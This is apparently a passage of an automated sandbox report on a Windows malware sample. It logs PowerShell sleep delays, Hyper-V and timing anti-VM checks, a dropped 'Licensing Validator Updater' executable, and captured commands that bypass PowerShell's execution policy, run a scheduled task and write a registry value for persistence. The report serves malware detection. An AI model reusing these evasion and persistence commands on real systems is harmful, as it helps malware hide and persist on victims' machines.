Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00000271256F2377 rdtsc 8_2_00000271256F2377
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1917
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7992
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2182
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7650
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1320
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2661
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1079
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7209
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5492Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep count: 2182 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep count: 7650 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe TID: 1732Thread sleep time: -34000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe TID: 7012Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1060Thread sleep count: 1320 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5928Thread sleep count: 2661 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3492Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588Thread sleep count: 1079 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588Thread sleep count: 7209 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeFile Volume queried: C:\Users\user\AppData\Roaming\Licensing Validator Updater FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFEB3192C90 GetSystemInfo,20_2_00007FFEB3192C90
Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user
Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user\AppData
Source: firefox.exe, 00000006.00000002.2631555644.000002A679E3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWu
Source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Standard (without Hyper-V)
Source: firefox.exe, 00000008.00000002.2658542490.0000027125D60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc)
Source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Hyper-V
Source: ModuleAnalysisCache.20.drBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Standard (core installation without Hyper-V)
Source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Enterprise (core installation without Hyper-V)
Source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Datacenter (core installation without Hyper-V)
Source: firefox.exe, 00000006.00000002.2631555644.000002A679E3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
Source: ModuleAnalysisCache.20.drBinary or memory string: Add-NetEventVmNetworkAdapter
Source: firefox.exe, 0000000A.00000002.2629114543.00000129186CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPc
Source: firefox.exe, 00000008.00000002.2658542490.0000027125D60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW6634-1003_Classes
Source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Essential Server Solutions (without Hyper-V)
Source: firefox.exe, 0000000A.00000002.2657246252.0000012918B00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: firefox.exe, 00000003.00000003.1635930320.000001CA7F2B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2657526488.000002A67A21B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Cluster Server (without Hyper-V)
Source: firefox.exe, 00000008.00000002.2627031954.00000271254AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW i
Source: ModuleAnalysisCache.20.drBinary or memory string: Get-NetEventVmNetworkAdapter
Source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Enterprise (without Hyper-V)
Source: firefox.exe, 00000006.00000002.2659811254.000002A67A300000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2658542490.0000027125D60000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000021.00000002.2623905798.000001C1E1ED2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: /%d%.15e%s%s%f%sOS random string generation failed, exitingguirpc.GetProductInfokernel32.dllMicrosoft Windows 11Windows 10Windows Server 23H2Windows Server 2022Windows Server 2019Windows Server 2016Windows 10 BetaWindows 10 Server BetaWindows 8.1Windows Server 2012 R2Windows 8Windows Server 2012Windows 7Windows Server 2008 "R2"Windows VistaWindows Server 2008Windows XPWindows Server 2003 "R2"Windows Server 2003Windows XPWindows 2000Windows NTWindows 95Windows 98Windows MillenniumWin32s, (%.2u.%.2u.%.4u.%.2u)Business Business N Core Core Core Core N Education Education N Embedded Standard Enterprise Enterprise E Enterprise N Enterprise N (Evaluation) Enterprise LTSB Enterprise LTSB Evaluation Enterprise LTSB N Enterprise LTSB N Evaluation Home Basic Home Basic E Home Basic N Home Premium Home Premium E Home Premium N IoT Enterprise IoT Enterprise LTSC Internet of Things Developer Preview Developer Preview N Professional Professional E Professional N Professional S Professional SN Professional with Media Center Starter Starter E Starter N ThinPC Ultimate Ultimate E Ultimate N Pro for Workstations Pro for Workstations N Home Professional Home Tablet PC Media Center Starter Professional Professional Workstation ARM64 Server Azure Stack HCI Cloud Host Infrastructure Server Cloud Storage Server Cluster Server Cluster Server (without Hyper-V) Datacenter (Evaluation) Datacenter, Semi-Annual Channel (core installation) Standard, Semi-Annual Channel (core installation) Datacenter Datacenter Azure Datacenter (core installation) Datacenter Azure (core installation) Datacenter (core installation without Hyper-V) Datacenter (without Hyper-V) Enterprise (Evaluation) Enterprise Enterprise (core installation) Enterprise (core installation without Hyper-V) Enterprise Enterprise (without Hyper-V) Essential Server Solution Additional Essential Server Solution 
Additional SVC Essential Server Solution Management Essential Server Solution Management SVC Home Server 2011Storage Server Essentials Hyper-V Essential Business Server Management Server Essential Business Server Messaging Server Essential Business Server Security Server MultiPoint Server Premium MultiPoint Server Standard Nano Server Essential Server Solutions Essential Server Solutions (without Hyper-V) Foundation Small Business ServerSmall Business Server Premium Small Business Server Premium (core installation) MultiPoint Server MultiPoint Server (core installation) Standard (Evaluation) Standard Standard (core installation) Standard (core installation without Hyper-V) Standard (without Hyper-V) Storage Server Enterprise Storage Server Enterprise (core installation) Storage Server Express Storage Server Express (core installation) Storage Server Standard (Evaluation) Storage Server Standard Storage Server Standard (core installation) Storage Server Workgroup (Evaluation) Storage Server Workgroup Storage Server Workgroup (core installation) Web Server Web Server (core installation) Small Business Server Esse
Source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Datacenter (without Hyper-V)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn CleanUpMgrTask_1659166102
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path "HKCU:\Software\Microsoft" -Name ExpirienceHost -Value 1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
